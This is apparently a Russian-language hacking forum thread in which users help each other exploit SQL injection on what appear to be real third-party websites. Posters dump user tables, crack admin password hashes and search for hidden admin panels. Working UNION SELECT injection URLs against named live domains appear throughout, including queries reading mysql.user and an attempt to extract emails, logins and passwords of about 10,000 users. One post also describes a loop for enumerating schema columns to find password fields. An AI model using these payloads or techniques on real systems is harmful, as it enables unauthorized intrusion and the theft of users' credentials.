верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%). Но найти ее трудновато (( "robots.txt" нету(((
просканил админфайндером и интеллитемпером - результата нет. вывод: админка в рандомной папке, на другом порту или ваще локальная.
Есть SQL inj Определил названия таблиц,названия столбцов Есть в users два таких столбца : password и current_hash. В котором из них пароль хранится ? В password - MYSQL хэш (расшифровал его,но при авторизации ошибку выдает),в current_hash - md5
пытался,положительного результата не достиг И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся
Всем добрый день. Все вопросы по Sql inj Первый вопрос, что делать если не могу найти таблицу пользователей, где то встречал уже этот же вопрос, но поиском найти не смог. На пример : Всё перебрал а такой таблицы найти не смог. Я подумал, что делаю что то не так, и решил посмотреть в теме Sql инъекции. Взял последний сайт. Убрал то что там было, и решил сделать сам всё с самого начала. Вот так перебрал до 50, результат - ничего не найдено Но, тут возникает вопрос, ведь tracy как то узнал вопрос как? растолкуйте пожалуйста этот момент. ================================== Последний вопрос, возможно самый тупой. У меня всё получилось, я узнал логин и пароль админа расшифровал хэш, НО я могу найти админку, поискав по форуму нашёл 1 скрипт и какой то софт, для автоматизации этого процесса, но прогнав этот сайт, всё равно ничего не нашёл. Возможно что то посоветуете? =================================== Ещё вспомнил Вот так, если поля логин и пассворд Но после такого запроса получаю Что я делаю не так?
Дальше терпения не хватило? Или ты думаешь, что всё заканчивается на 50-ой таблице? =\ Таблица в другой бд http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,table_schema,4,5,database(),7,8,9+from+information_schema.columns+where+table_name='USER'+limit+1,100+--+ Запрос к этой таблице в бд mysql http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9+from+mysql.user+--+
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел.. когда знаем точное число запускаем цикл аля for(int i=0;i<700;i++) и в цикле дергаем table_schema table_name table_column, куда то пишем и дальше уже через ctrl+f ишем все что нас интересует (pass|password|login etc) . для этих целей под себя лучше всего свой велосипед смастерить если знаний хватит.
есть 2 базы inform.schema data делаю такой запрос: http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users -- пишет что не существует поля email http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data -- и так http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users -- тоже самое Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
Как здесь можно помочь разобраться с запросом- если мы не знаем настоящую ссылку? Ведь насколько я помню доменная зона om обычно используется с приставкой net (net.om) покрайней мере по твоей ссылке зайти не могу и гугл домен sffaoss.om - незнает..... P.S. Или это только у меня ???
